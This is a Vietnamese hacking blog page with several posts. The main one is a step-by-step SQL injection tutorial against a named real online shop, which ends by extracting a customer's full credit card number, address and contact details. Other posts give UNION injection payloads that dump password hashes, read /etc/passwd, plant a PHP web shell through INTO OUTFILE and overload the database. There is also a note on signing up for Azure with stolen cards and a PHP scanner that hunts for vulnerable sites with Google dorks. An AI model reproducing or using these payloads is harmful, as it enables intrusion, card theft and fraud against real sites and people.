Thứ Tư, 23 tháng 3, 2011

TUT hack shop php mysql injection 5.0

victim: https://www.185elgin.com/customer_te...timonial_id=25'


Quote:

1064 - You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '\'' at line 1

select * FROM customer_testimonials WHERE testimonials_id = 25\' 
de nhan biet loi nay co hack dc nua ko ta querry them 1 chut nay de nhan biet dc 

https://www.185elgin.com/customer_te...timonial_id=25 and 1=1/*

bat ra 1 page voi gia tri true = 1 

https://www.185elgin.com/customer_te...timonial_id=25 and 1=0/*

bat ra 1 page voi gia tri false = 0

anh em du dk tren thi tien hanh hack site nha'


bay gio ta di tim site nay co bao nhieu colum de khai thac ra loi 




https://www.185elgin.com/customer_te...,3,4,5,6,7,8--

Querry từ 1-8 nhảy ra lỗi này 

Quote:

nhay ra loi 3&6 ta lay o vi tri so 3 nhe
3

6
Đinh vị lấy số 3 làm tâm điểm như dưới nha !

bay gio ta tim xem phien ban mysql cua site nay la bao nhieu de tuy bien khai thac nhe

ta nen dung ham concat_ws(0x3a,version(),user(),database() de tim nhe

https://www.185elgin.com/customer_te...)),4,5,6,7,8--

nhu vay la ver mysql 5.0.xx


Quote:

5.0.51a-community:sendmc2_script@localhost:sendmc2_185elgi n

den day ta co the khai thac theo kieu inject mysql 5.0 roai 


ta di tim table dau tien cua site nhe

https://www.185elgin.com/customer_te...0limit%201,1--



Quote:

ra tiep table dau tien la: COLLATIONS 
Meo nho cho cac tester luoi querry ra tung table mot ta lam nhu sau 


https://www.185elgin.com/customer_te...chema.tables--


Quote:


CHARACTER_SETS,COLLATIONS,COLLATION_CHARACTER_SET_ APPLICABILITY,COLUMNS,COLUMN_PRIVILEGES,KEY_COLUMN _USAGE,PROFILING,ROUTINES,SCHEMATA,SCHEMA_PRIVILEG ES,STATISTICS,TABLES,TABLE_CONSTRAINTS,TABLE_PRIVI LEGES,TRIGGERS,USER_PRIVILEGES,VIEWS,address_book, address_format,banners,banners_history,card_surcha rges,categories,categories_description,configurati on,configuration_group,counter,counter_history,cou ntries,currencies,customer_testimonials,customers, customers_basket,customers_basket_attributes,custo mers_info,geo_zones,languages,link_categories,link _categories_description,links,links_check,links_de scription,links_featured,links_status,links_to_lin k_categories,manufacturers,manufacturers_info,news letters,orders,orders_maxmind,orders_products,orde rs_products_attributes,orders_products_download,or ders_status,orders_status_history,orders_total,pro ducts,products_attributes,products_attributes_down load,products_description,products_notifications,p roducts_options,products_options_values,products_o ptions_values_to_product
do the la ta da co table dau tien va cac cac tables cua site roi.

bay gio ta tien hanh tim table nao co chua cc nha :d

ta tien hanh querry lay tat ca cc tu table orders xem nhe'

truoc tien phai convert sang dang hex nhe

ta vao day http://www.vortex.prodigynet.co.uk/misc/ascii_conv.html
convert orders ra cai nay 0x6F7264657273

https://www.185elgin.com/customer_te...0x6F7264657273


Quote:

orders_id

6
Click here to view all testimonials




Testimonial by 4
customers_id

6
Click here to view all testimonials




Testimonial by 4
customers_name

6
Click here to view all testimonials



...........................................

Xong roi day ta lay nhung info can thiet de get cc nao

https://www.185elgin.com/customer_te...+from+orders--



Quote:


8/American Express/Alexander Cassini/371382972132008/1207/2523 3rd street//Santa Monica/90405/California/United States/310-560-1803/acassini@aol.com/2005-10-20 12:27:23

hack shop bị deny SELECT

bình thường khi query

Quote:
convert(int,(select top 1 table_name from information_schema.tables))--[
bay ra lỗi
Quote:
Syntax error converting the nvarchar value 'table_name' to a column of data type int[/b]
nhưng nếu bay ra lỗi
Quote:
SELECT permission denied on object 'sysobjects', database 'XXXXX', owner 'dbo'.
thường anh em bỏ nó or toàn chơi tool thấy ko query dc bỏ luôn.
thằng admin đã deny SELECT ,ko SELECT thì convert dc cái khỉ j` .
dùng query sau:
Quote:
;use dataname grant keyword on tables to public
trc' hết dùng convert(int,db_name()) để bít dataname,ví dụ là vnc
query fat nào

Quote:
;use vnc grant select on sysobjects to public--
hack xong ta lại deny mẹ cái select cho thằng vịt khác ko hack dc nữa

TUT hack php part2

Lỗi MySQL là một lỗi rất là thông dụng và nguy hiểm.Khác với các lỗi khác MySQL bị lỗi là cho người viết mã gây ra hay bị sai sót
Lỗi MySQL đem lại những lợi ích như thế nào?
Nó cho phép người sử dụng có thể khai thác dễ dàng vào các database.Nói rõ hơn nó cho ta thấy được những thông số có liên quan đến victim chứa lỗi.MySQL Inj có thể phá hủy tập tin hay cho phép các tập tin khác mà attacker chèn vào
Bây giờ chúng ta nhìn vào 1 số ví dụ về code php
<? php
...
$ id = $ _GET [ 'id'];
...
mysql_query ( "UNION SELECT nick FROM users WHERE id =". );..... $ id
?> 

Chúng ta cần lưu ý về phương thức lấy đoạn ma GET .Anh em hãy để ý kỹ về đoạn mã php ở trên.Chúng ta có thể thay đổi yêu cầu truy vấn dựa vào GET.Nếu nó không lọc phần [ 'id'] mà chúng ta truy vấn vào dữ liệu của victim thì có nghĩa là nó bị lỗi MySQL.
Làm sao mà biết chính xác là nó bị lỗi.Sau đấy là 1 ví dụ :


Code:
http://www.site.ru/index.php?page=1
Với 1 trang như thế ,để ta biết nó có bị dính lỗi hay ko thi ta cần thêm vào 1 ký tự như dấu '

+
Code:
http://www.site.ru/index.php?page=1
'

Và khi nó bị dính MySQL thì website sẽ gởi lại cho ta biết với 1 thông báo như sau:

+MySQL Error: mysql_query (.......) error expretion syntax ...

Câu nói ở đây có nghĩa là có 1 truy vấn đang bị lỗi về cấu trúc toán học hay thư mục.Và 99% đây là lỗi source.

Ngoài ra ta còn 1 phương các nữa là ta dùng phương thức toán học đơn giản như sau:

+
Code:
http://www.site.ru/index.php?page=2-1
Và nó trở về 1 thì 99% nó bị dính mysql.
Khi ta biết chính xác nó bị lỗi thì ta sẽ khai thác như sau.Chúng ta cần gởi 1 truy vấn sql đến victim nhưng chúng ta cần truy vấn với giá trĩ là null.Null ở đây là rỗng không có 1 giá trị xác thực.
Đây là 
+
Code:
http://www.site.ru/index.php?page=-1 union + + + select null, null / *
or
Code:
http://www.site.ru/index.php?page=99999 union + + + select null, null / *
Chúng ta sẽ sử dụng lần lượt các câu truy vấn thông dụng như:
+union select null, null 
union select null, null, null 
union select null, null, null, null 

Lệnh union ở đây chính là lênh kết nối các bảng lại với nhau.Chúng ta cứ sử dụng cho đến khi biết 9 xác có bao nhiêu bảng dữ liệu nằm trong database

+
Code:
http://www.site.ru/index.php?page=-1 union + + + select null, null, null, null, null, null / *
Sau khi đã xác định được bảng ta xét đến nó có bao nhiệu cột nằm trong bảng.Với câu lệnh sau sẽ giúp ta xác định:

+? id =- 1 + + by order +100 / *

Dĩ nhiên các cột không thể nào quá 100 cột được.Với cách thức này ta có thể nhanh chóng biết được bao nhiêu cột.Và có sai thì nó sẽ báo lổi.

Sau khi đã biết chính xác được có bao nhiêu cột thì ta sẽ thay thế các giá trị null mà hồi nãy ta truy vấn bằng các con số 9 xác như 1,2,3,..

+
Code:
http://www.site.ru/index.php?page=-1 + union + select +1,2,3,4,5,6 / *
Sau đó ta sẽ lấy 1 số thông tin như user database...Và ta cần biết 9 xác nó nằm ở cột nào mới truy vấn và tìm

+
Code:
http://www.site.ru/index.php?page=-1 + union + +1.2 select, USER (), 4,5,6 / *
Code:
http://www.site.ru/index.php?page=-1 + union + +1.2 select, VERSION (), 4,5,6 / *
Code:
http://www.site.ru/index.php?page=-1 + union + +1.2 select, DATABASE (), 4,5,6 / *
*Sau khi có được các thông tin thì ta cần làm những bước sau tùy vào ý thích của mỗi người

1-Lấy pass của thằng root(Nó là quan trọng 1 mà)
+
Code:
http://www.site.ru/index.php?page=-1 + union + +1.2 select, user, password, 5,6 mysql.user + from + / *
Và nó sẽ cho ra pass là pass hash và chúng ta dùng các chương trình crack pass để lấy mã.Ví dụ như chương trình password pro.Lưu ý phương thức lấy pass bằng câu lệnh trên ko có nghĩa lúc nào cũng cho ra pass mà còn phụ thuộc vào thằng mysql.user có chấp nhận yêu cầu của ta hay ko.

2-Đọc các bảng khác có liên quan đến thằng root:
Chúng ta có thể đọc các bảng có liên quan như:spreadsheet-type users, reg_users, admins, accounts ...


+
Code:
http://www.site.ru/index.php?page=-1 + union + +1.2 select, name, passwd, 4,5,6 + + from users / *
3-Đọc tập tin chứ trên server:
+
Code:
http://www.site.ru/index.php?page=-1 + union + +1.2 select, LOAD_FILE ( '/ etc / passwd'), 4,5,6 / *
Nếu chúng ta xác định 9 xác tập tin ta cần đọc thì phần LOAD_FILE sẽ giúp ích cho ta rất nhiều.

4-Up shell và ddos:
Chúng ta cần nhận thấy là chúng ta cần nên đưa con shell ở bên ngoài vào sao cho phù hợp 1.Và thư mục mà ta cần quan tâm và phù hợp 1 chính là "/ home / site / public_html /"

Code up shell:

+http://www.site.ru/index.php?page=-1 + union + select +1,2,3,4,5, '<? php system ($ _GET [cmd]);>' + + + from mysql.user into outfile + + '/ home / site / public_html / shell.php' / *

Việc up shell là phần quan trọng 1 đối với lỗi MYSQL.Và 1 điều quan trọng ko kém là chúng ta cần đưa thêm biến hay tham số ,cụ thể là số.Nó sẽ giúp ta thực hiện được 1 số lệnh bị giới hạn trong mysql.
Ví dụ:union select 1.2, user, pass, from 5,6 + + + users limit +5.3 / * [/ i]
Chúng sẽ thử lại 3 lần với cột số 5

Đôi khi chúng ta gặp phải 1 số cơ chế lọc hay mã hóa trong mysql.Chính vì vậy để giải quyết vấn đề loại bỏ cơ chế trên ta cần 1 câu lệnh ko kém phần quan trọng


+
Code:
http://www.site.ru/index.php?page=-1 + union + +1.2 select, AES_DECRYPT (AES_ENCRYPT (USER (), 0x71), 0x71), 4,5,6 / *
1 điều cần lưu ý là khi bộ lọc kovychku của sql được bật thì chúng ta có thể dùng đến phần LOAD_FILE
Ví dụ ta đưa vào LOAD_FILE phần đọc thư mục / etc / passwd thì chúng ta dùng đoạn code sau:

+
Code:
http://www.site.ru/index.php?page=-1 + union + +1.2 select, LOAD_FILE (char (47101116,99,47112,97115115119100)), 4,5,6 / *
Đôi khi ta bị thằng inektsiya giới hạn việc sử dụng các khoản không gian sử dụng.Để xác lập lại ta dùng các lệnh sau:
+
Code:
http://www.site.ru/index.php?page=-1 + union + +1.2 select, user, password, 5,6 mysql.user + from + / *
same

Code:
http://www.site.ru/index.php?page=-1/ ** / union / ** / select / ** / 1.2, user,
Phần cuối là dos:Chắc câu lệnh này mọi người ai cũng hiểu ha:
+
Code:
http://www.site.ru/index.php?page=-1 + BENCHMARK (10000000, BENCHMARK (10000000 md5 (current_date)))

TUT hack php

http://www.site.ru/index.php?page=1 '
Bay ra 1 cái đại loại thế nè 
MySQL Error: mysql_query (.......) error expretion syntax ...
99% lỗi
số col nhé

Quote:
? id =- 1 + + by order +7 / *
đến 7 nó lỗi mà 6 chưa lỗi thì

Quote:
http://www.site.ru/index.php?page=-1 + union + select +1,2,3,4,5,6 / *
hình ở link nó hiện ra số,exp là 3

Quote:
http://www.site.ru/index.php?page=-1 + union + +1.2 select, USER (), 4,5,6 / *->user
Quote:
http://www.site.ru/index.php?page=-1 + union + +1.2 select, VERSION (), 4,5,6 / *->version
Quote:
http://www.site.ru/index.php?page=-1 + union + +1.2 select, DATABASE (), 4,5,6 / *--database name
get pass mysql

Quote:
http://www.site.ru/index.php?page=-1 + union + +1.2 select, user, password, 5,6 mysql.user + from + / *
Get info trong 1 tab khi biết col+Tab

Quote:
http://www.site.ru/index.php?page=-1 + union + +1.2 select, name, passwd, 4,5,6 + + from users / *
Đọc file trên server nếu có perm và biết path

Quote:
http://www.site.ru/index.php?page=-1+ union + +1.2 select, LOAD_FILE ( '/ etc / passwd'), 4,5,6 / *
Chèn shell

Quote:
http://www.site.ru/index.php?page=-1 + union + select +1,2,3,4,5, '<? php system ($ _GET [cmd]);>' + + + from mysql.user into outfile + + '/ home / site / public_html / shell.php' / *
DDos bằng mysql

Quote:
http://www.site.ru/index.php?page=-1 + BENCHMARK (10000000, BENCHMARK (10000000 md5 (current_date)))
cái nè làm cho mysql chạy như điên,process lên 99% cash luôn máy(dã test)

Thứ Năm, 17 tháng 3, 2011

Reg Azure của microsoft fix

http://mkhahero.blogspot.com/2011/02/tutfang-vps-windows-azure.html

thay đổi tí :
Sock trùng city của cvv
c2 : zipcode,city,state >>>> 3 cái này chỉnh theo info sock.

TUT fix by mkhahero ( đừng thằng nào nói leech ) :|

Thứ Ba, 15 tháng 3, 2011

PHP : Dork Scanner SQL Injection

<html>
<head>
<title>Masokis SQLi Scanner</title>
<style>
body{
background: #0F0F0F;
color: #F9F9F9;
font-family: monospace;
font-size: 12px;
}

input{
background: #0F0FCC;
border: 1px solid #00FFCC;
color: #00FFCC;
}

h2{
color: #55FFCC;
}

a{ color: #5A5A5A; text-decoration: none; }
a:visited, a:active{ color: #5C5C5C; text-decoration: line-through; }
a:hover{ color: #00FFCC; text-decoration: line-through; }
.effectok:hover { text-decoration: underline; }
.effectfalse:hover { text-decoration: line-through; }

</style>

</head>
<body align="center">

<?php
echo "<h2>SQLI Online Scanner</h2>";
echo "<form action='' method='post'>";
echo "<b>Dork</b>: <p><input type='text' name='dork' value='inurl:php?=id+site'></p>";
echo "<input type='submit' value='  Let's Get Started!  '>";
echo "<hr><br />";

if($_POST['dork']) {

@set_time_limit(0);
@error_reporting(0);
@ignore_user_abort(true);
ini_set('memory_limit', '128M');

$google = "http://www.google.com/cse?cx=013269018370076798483%3Awdba3dlnxqm&q=REPLACE_DORK&num=100&hl=en&as_qdr=all&start=REPLACE_START&sa=N";

$i = 0;
$a = 0;
$b = 0;

while($b <= 900) {
$a = 0;
flush(); ob_flush();
echo "@ Pages: [ $b ]<br />";
echo "@ Dork: [ <b>".$_POST['dork']."</b> ]<br />";
echo "@ Google Scanner ! .<br />";
flush(); ob_flush();

if(preg_match("/did not match any documents/", Connect_Host(str_replace(array("REPLACE_DORK", "REPLACE_START"), array("".$_POST['dork']."", "$b"), $google)), $val)) {
echo "See something but not found??<br />";
flush(); ob_flush();
break;
}

preg_match_all("/<h2 class=(.*?)><a href=\"(.*?)\" class=(.*?)>/", Connect_Host(str_replace(array("REPLACE_DORK", "REPLACE_START"), array("".$_POST['dork']."", "$b"), $google)), $sites);
echo "Result of injection...<br />";
flush(); ob_flush();
while(1) {

if(preg_match("/You have an error in your SQL|Division by zero in|supplied argument is not a valid MySQL result resource in|Call to a member function|Microsoft JET Database|ODBC Microsoft Access Driver|Microsoft OLE DB Provider for SQL Server|Unclosed quotation mark|Microsoft OLE DB Provider for Oracle|Incorrect syntax near|SQL query failed/", Connect_Host(str_replace("=", "='", $sites[2][$a])))) {
echo "<a href='".Clean(str_replace("=", "='", $sites[2][$a]))."' target='_blank' class='effectok'>".str_replace("=", "='", $sites[2][$a])."</a> <== <font color='green'>Yeah..Vulnerable ! </font><br />";
} else {
echo "<a href='".Clean(str_replace("=", "='", $sites[2][$a]))."' target='_blank' class='effectfalse'>".str_replace("=", "='", $sites[2][$a])."</a> <== <font color='red'>Not Vulnerable..sorry! </font><br />";
flush(); ob_flush();
}
if($a > count($sites[2])-2) {
echo "Lets..scan other page.. <br />";
break;
}
$a = $a+1;
}
$b = $b+100;
}
}

function Connect_Host($url) {
$ch = curl_init();
curl_setopt($ch, CURLOPT_FOLLOW, 0);
curl_setopt($ch, CURLOPT_HEADER, 1);
curl_setopt($ch, CURLOPT_URL, $url);
curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
curl_setopt($ch, CURLOPT_TIMEOUT, 30);
$data = curl_exec($ch);
if($data) {
return $data;
} else {
return 0;
}
}

function Clean($text) {
return htmlspecialchars($text, ENT_QUOTES);
}

?>

</body>
</html>
<br> masokis[a]gmail.com</br><p>
<center> This tools for education purpose only !!!</center>

 
Design by mkha.hero